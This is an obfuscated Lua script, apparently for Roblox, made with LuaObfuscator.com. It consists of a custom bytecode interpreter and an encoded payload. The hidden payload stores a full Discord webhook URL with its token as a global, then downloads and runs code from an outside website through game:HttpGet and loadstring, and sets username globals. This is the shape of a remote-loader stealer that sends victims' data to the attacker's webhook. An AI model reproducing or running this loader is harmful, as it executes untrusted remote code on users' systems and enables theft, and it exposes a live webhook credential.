--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==1) then function v21(v31,v32,v33) if v33 then local v82=(v31/((5 -3)^(v32-(1 + 0))))%(((2 + 3) -3)^(((v33-(1 -0)) -(v32-(1 + 0))) + (1 -0))) ;return v82-(v82%(1066 -(68 + 997))) ;else local v83=0 -0 ;local v84;while true do if (v83==(0 -(957 -(892 + 65)))) then v84=(621 -(555 + 64))^(v32-(932 -(857 + (176 -102)))) ;return (((v31%(v84 + v84))>=v84) and (569 -(367 + 201))) or (927 -(214 + 713)) ;end end end end v22=nil;function v22() local v34=v1(v16,v19,v19);v19=v19 + 1 ;return v34;end v23=nil;v18=2;end if (2==v18) then function v23() local v35,v36=v1(v16,v19,v19 + (3 -1) );v19=v19 + (3 -1) ;return (v36 * 256) + v35 ;end v24=nil;function v24() local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==0) then v38,v39,v40,v41=v1(v16,v19,v19 + (353 -(87 + 263)) );v19=v19 + (184 -(67 + 66 + 47)) ;v37=1 + 0 ;end if (v37==((2 -0) -1)) then return (v41 * ((12340027 -(1069 + 118)) + 4438376)) + (v40 * (47703 + 17833)) + (v39 * (1253 -(915 + 82))) + v38 ;end end end v25=nil;v18=3;end if (v18==4) then v28=nil;function v28(...) return {...},v12("#",...);end v29=nil;function v29() local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v42~=(1827 -(1195 + 629))) then else local v90=0 -0 ;while true do if (v90==0) then v49=nil;v50=nil;v90=1;end if (1==v90) then v42=245 -(187 + 54) ;break;end end end if (v42==4) then while true do if (v43~=(780 -(162 + 618))) then else local v102=0;local v103;while true do if (v102==(0 + 0)) then v103=0;while true do if (v103==(0 + 0)) then v44=0 -0 ;v45=nil;v103=1 -0 ;end if (v103==1) then v43=1;break;end end break;end end end if (v43~=1) then else local v104=0 + 0 ;local v105;while true do if ((1636 -(1373 + 263))==v104) then v105=0;while true do if (v105==1) then v43=1002 -(451 + 549) ;break;end if (v105~=0) then else local v109=0 + 0 ;while true do if (v109~=(0 -0)) then else v46=nil;v47=nil;v109=1 -0 ;end if (1==v109) then v105=1;break;end end end end break;end end end if ((1386 -(746 + 638))~=v43) then else v48=nil;v49=nil;v43=2 + 1 ;end if (v43==(4 -1)) then v50=nil;while true do local v106=0;local v107;while true do if ((341 -(218 + 123))~=v106) then else v107=0;while true do if (v107~=(1582 -(1535 + 46))) then else if (2==v44) then local v130=0;while true do if (v130==1) then return v48;end if (v130~=0) then else local v165=0;while true do if (v165~=(1 + 0)) then else v130=1 + 0 ;break;end if (v165~=(560 -(306 + 254))) then else for v175=1 + 0 ,v24() do local v176=0 -0 ;local v177;local v178;while true do if (v176==1) then while true do if (v177==(1467 -(899 + 568))) then v178=v22();if (v21(v178,1,1 + 0 )~=(0 -0)) then else local v189=603 -(268 + 335) ;local v190;local v191;local v192;local v193;local v194;local v195;while true do if (2==v189) then v194=nil;v195=nil;v189=293 -(60 + 230) ;end if (v189==(572 -(426 + 146))) then v190=0 + 0 ;v191=nil;v189=1;end if (3~=v189) then else while true do if (2~=v190) then else v195=nil;while true do if (v191==2) then while true do if (v192~=(1457 -(282 + 1174))) then else local v203=0;while true do if (v203==1) then v192=2;break;end if (v203==(811 -(569 + 242))) then v195={v23(),v23(),nil,nil};if (v193==0) then local v214=1251 -(721 + 530) ;local v215;while true do if (0==v214) then v215=1271 -(945 + 326) ;while true do if (v215~=(0 -0)) then else v195[3 + 0 ]=v23();v195[704 -(271 + 429) ]=v23();break;end end break;end end elseif (v193==1) then v195[3 + 0 ]=v24();elseif (v193==2) then v195[1503 -(1408 + 92) ]=v24() -((1088 -(461 + 625))^16) ;elseif (v193~=3) then else local v224=0;local v225;local v226;local v227;while true do if (v224~=0) then else v225=1288 -(993 + 295) ;v226=nil;v224=1 + 0 ;end if (v224~=(1172 -(418 + 753))) then else v227=nil;while true do if (v225==0) then v226=0;v227=nil;v225=1;end if (v225==(1 + 0)) then while true do if (v226~=0) then else v227=0 + 0 ;while true do if (v227~=0) then else v195[3]=v24() -(2^16) ;v195[2 + 2 ]=v23();break;end end break;end end break;end end break;end end end v203=1 + 0 ;end end end if (v192==(532 -(406 + 123))) then if (v21(v194,1772 -(1749 + 20) ,1 + 2 )==(1323 -(1249 + 73))) then v195[2 + 2 ]=v50[v195[4]];end v45[v175]=v195;break;end if (v192~=0) then else local v205=1145 -(466 + 679) ;while true do if (v205~=(0 -0)) then else local v213=0;while true do if (v213~=(0 -0)) then else v193=v21(v178,1902 -(106 + 1794) ,1 + 2 );v194=v21(v178,2 + 2 ,6);v213=1;end if (v213==(2 -1)) then v205=2 -1 ;break;end end end if (v205==(115 -(4 + 110))) then v192=585 -(57 + 527) ;break;end end end if (v192==2) then local v206=0;local v207;while true do if (v206==0) then v207=0;while true do if (0==v207) then if (v21(v194,1,1428 -(41 + 1386) )==(104 -(17 + 86))) then v195[2 + 0 ]=v50[v195[3 -1 ]];end if (v21(v194,2,5 -3 )~=(167 -(122 + 44))) then else v195[5 -2 ]=v50[v195[3]];end v207=3 -2 ;end if (1==v207) then v192=3 + 0 ;break;end end break;end end end end break;end if ((1 + 0)==v191) then local v202=0;while true do if (v202~=(0 -0)) then else local v208=65 -(30 + 35) ;while true do if (v208==(0 + 0)) then v194=nil;v195=nil;v208=1;end if (v208~=1) then else v202=1258 -(1043 + 214) ;break;end end end if (v202==(3 -2)) then v191=1214 -(323 + 889) ;break;end end end if (v191~=0) then else v192=0;v193=nil;v191=2 -1 ;end end break;end if (0~=v190) then else v191=0;v192=nil;v190=581 -(361 + 219) ;end if (v190==(321 -(53 + 267))) then local v198=0 + 0 ;while true do if (v198~=(414 -(15 + 398))) then else v190=2;break;end if (0==v198) then v193=nil;v194=nil;v198=1;end end end end break;end if (v189==1) then v192=nil;v193=nil;v189=984 -(18 + 964) ;end end end break;end end break;end if (v176==(0 -0)) then v177=0;v178=nil;v176=1 + 0 ;end end end for v179=1 + 0 ,v24() do v46[v179-(851 -(20 + 830)) ]=v29();end v165=1;end end end end end break;end if ((0 + 0)==v107) then if (v44==1) then local v131=0;local v132;while true do if (v131==(126 -(116 + 10))) then v132=0 + 0 ;while true do if (v132~=(738 -(542 + 196))) then else local v173=0 -0 ;while true do if (0==v173) then v49=v24();v50={};v173=1 + 0 ;end if (v173==1) then v132=1 + 0 ;break;end end end if (1~=v132) then else local v174=0;while true do if (v174==(1 + 0)) then v132=2;break;end if (v174~=(0 -0)) then else for v182=1,v49 do local v183=0 -0 ;local v184;local v185;local v186;local v187;local v188;while true do if (v183==(1553 -(1126 + 425))) then v188=nil;while true do if (v184~=(406 -(118 + 287))) then else local v196=0;while true do if (v196==(0 -0)) then v187=nil;v188=nil;v196=1122 -(118 + 1003) ;end if (v196==(2 -1)) then v184=379 -(142 + 235) ;break;end end end if (v184==2) then while true do if (v185==(4 -3)) then v188=nil;while true do if (v186~=1) then else if (v187==(1 + 0)) then v188=v22()~=(977 -(553 + 424)) ;elseif (v187==(3 -1)) then v188=v25();elseif (v187==(3 + 0)) then v188=v26();end v50[v182]=v188;break;end if (v186~=0) then else local v200=0;local v201;while true do if ((0 + 0)~=v200) then else v201=0;while true do if (v201==1) then v186=1 + 0 ;break;end if (v201==(0 + 0)) then local v209=0 + 0 ;local v210;while true do if (v209==(0 -0)) then v210=0 -0 ;while true do if (v210~=(0 -0)) then else v187=v22();v188=nil;v210=1 + 0 ;end if (v210~=(4 -3)) then else v201=1;break;end end break;end end end end break;end end end end break;end if (v185==0) then v186=0;v187=nil;v185=754 -(239 + 514) ;end end break;end if (v184~=0) then else local v197=0 + 0 ;while true do if ((1329 -(797 + 532))==v197) then v185=0 + 0 ;v186=nil;v197=1;end if (v197==(1 + 0)) then v184=1;break;end end end end break;end if (v183~=(2 -1)) then else v186=nil;v187=nil;v183=2;end if (v183==0) then v184=1202 -(373 + 829) ;v185=nil;v183=1;end end end v48[3]=v22();v174=1;end end end if ((733 -(476 + 255))==v132) then v44=1132 -(369 + 761) ;break;end end break;end end end if (v44~=(0 + 0)) then else local v133=0;while true do if (v133~=1) then else local v166=0;while true do if (v166==(0 -0)) then v47={};v48={v45,v46,nil,v47};v166=1;end if (v166~=(1 -0)) then else v133=338 -(144 + 192) ;break;end end end if (v133~=(216 -(42 + 174))) then else v45={};v46={};v133=1 + 0 ;end if (v133==2) then v44=1;break;end end end v107=1;end end break;end end end break;end end break;end if (2==v42) then local v91=0 + 0 ;while true do if (v91==1) then v42=3;break;end if (v91==0) then v47=nil;v48=nil;v91=1 + 0 ;end end end if (v42==1) then local v92=0;while true do if (1==v92) then v42=1506 -(363 + 1141) ;break;end if (v92~=(1580 -(1183 + 397))) then else v45=nil;v46=nil;v92=2 -1 ;end end end if (v42==(0 + 0)) then v43=0;v44=nil;v42=1;end end end v18=5;end if (3==v18) then function v25() local v51=v24();local v52=v24();local v53=1 + (1125 -(936 + 189)) ;local v54=(v21(v52,1 + 0 ,20) * ((1977 -(1913 + (1675 -(1565 + 48))))^32)) + v51 ;local v55=v21(v52,14 + 7 ,81 -(31 + 19) );local v56=((v21(v52,1965 -(565 + (2506 -(782 + 356))) )==(3 -2)) and  -(1662 -(1477 + 184))) or ((268 -(176 + 91)) -0) ;if (v55==0) then if (v54==0) then return v56 * (0 + 0) ;else v55=857 -((1469 -905) + 292) ;v53=0;end elseif (v55==(3531 -1484)) then return ((v54==(0 -0)) and (v56 * ((305 -(244 + 60))/(0 + (0 -0))))) or (v56 * NaN) ;end return v8(v56,v55-(1499 -(41 + 435)) ) * (v53 + (v54/((1003 -((2030 -(975 + 117)) + 63))^((1915 -(157 + 1718)) + 12)))) ;end v26=nil;function v26(v57) local v58=611 -(602 + 9) ;local v59;local v60;while true do if (v58==(2 + 0)) then v60={};for v93=3 -2 , #v59 do v60[v93]=v2(v1(v3(v59,v93,v93)));end v58=10 -7 ;end if (v58==(1018 -(697 + 321))) then v59=nil;if  not v57 then local v99=0 -0 ;while true do if (v99==(0 -(1189 -(449 + 740)))) then v57=v24();if (v57==(0 -0)) then return "";end break;end end end v58=1 + 0 ;end if (v58==(5 -2)) then return v6(v60);end if (v58==(2 -1)) then v59=v3(v16,v19,(v19 + v57) -(1228 -(322 + 905)) );v19=v19 + v57 ;v58=2;end end end v27=v24;v18=4;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61) if (v1(v61,2)==79) then local v85=0;while true do if (v85==0) then v20=v0(v3(v61,1,1));return "";end end else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v61,16));if v20 then local v108=v5(v87,v20);v20=nil;return v108;else return v87;end break;end end end end);v21=nil;v18=1;end if (v18==5) then v30=nil;function v30(v62,v63,v64) local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...) local v68=v65;local v69=v66;local v70=v67;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v88=0,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + 1 ];else v78[v88]=v75[v88 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v89=0;while true do if (0==v89) then v80=v68[v72];v81=v80[1];v89=1;end if (1==v89) then if (v81<=9) then if (v81<=4) then if (v81<=1) then if (v81==0) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else do return;end end elseif (v81<=2) then do return;end elseif (v81>3) then local v135=0;local v136;while true do if (v135==0) then v136=v80[2];v78[v136]=v78[v136](v13(v78,v136 + 1 ,v73));break;end end else v78[v80[2]]=v80[3];end elseif (v81<=6) then if (v81==5) then v78[v80[2]]=v64[v80[3]];else v64[v80[3]]=v78[v80[2]];end elseif (v81<=7) then local v114=0;local v115;local v116;local v117;local v118;while true do if (v114==0) then v115=v80[2];v116,v117=v71(v78[v115](v13(v78,v115 + 1 ,v80[3])));v114=1;end if (v114==2) then for v161=v115,v73 do v118=v118 + 1 ;v78[v161]=v116[v118];end break;end if (v114==1) then v73=(v117 + v115) -1 ;v118=0;v114=2;end end elseif (v81>8) then local v139=0;local v140;while true do if (0==v139) then v140=v80[2];v78[v140]=v78[v140](v13(v78,v140 + 1 ,v73));break;end end else v78[v80[2]]=v64[v80[3]];end elseif (v81<=14) then if (v81<=11) then if (v81>10) then v78[v80[2]]();else v72=v80[3];end elseif (v81<=12) then local v120=0;local v121;local v122;while true do if (0==v120) then v121=v80[2];v122=v78[v80[3]];v120=1;end if (1==v120) then v78[v121 + 1 ]=v122;v78[v121]=v122[v80[4]];break;end end elseif (v81>13) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v72=v80[3];end elseif (v81<=16) then if (v81>15) then local v123=0;local v124;local v125;while true do if (0==v123) then v124=v80[2];v125=v78[v80[3]];v123=1;end if (v123==1) then v78[v124 + 1 ]=v125;v78[v124]=v125[v80[4]];break;end end else v78[v80[2]]=v80[3];end elseif (v81<=17) then v64[v80[3]]=v78[v80[2]];elseif (v81==18) then v78[v80[2]]();else local v144=v80[2];local v145,v146=v71(v78[v144](v13(v78,v144 + 1 ,v80[3])));v73=(v146 + v144) -1 ;local v147=0;for v159=v144,v73 do local v160=0;while true do if (v160==0) then v147=v147 + 1 ;v78[v159]=v145[v147];break;end end end end v72=v72 + 1 ;break;end end end end;end return v30(v29(),{},v17)(...);end end end return v15("LOL!0B3O00028O00026O00F03F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3132353036352O3031373433343330383732332F315967415F4A4B4E53386447306B32395F6A707463335F484B77312O774C654275624A48494A43796A59584C5063356F524C596D6A6D664B2O7665614D66493858696835030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403173O00682O7470733A2O2F65676F72696B7573612E737061636503083O00557365726E616D6503063O005363652O6E3703093O00557365726E616D653200163O00120F3O00013O00264O000D0001000200040A3O000D000100120F000100043O001206000100033O001205000100053O001205000200063O00201000020002000700120F000400084O0013000200044O000400013O00022O000B00010001000100040A3O0015000100264O00010001000100040A3O0001000100120F0001000A3O001206000100093O00120F0001000A3O0012060001000B3O00120F3O00023O00040A3O000100012O00013O00017O00",v9(),...);
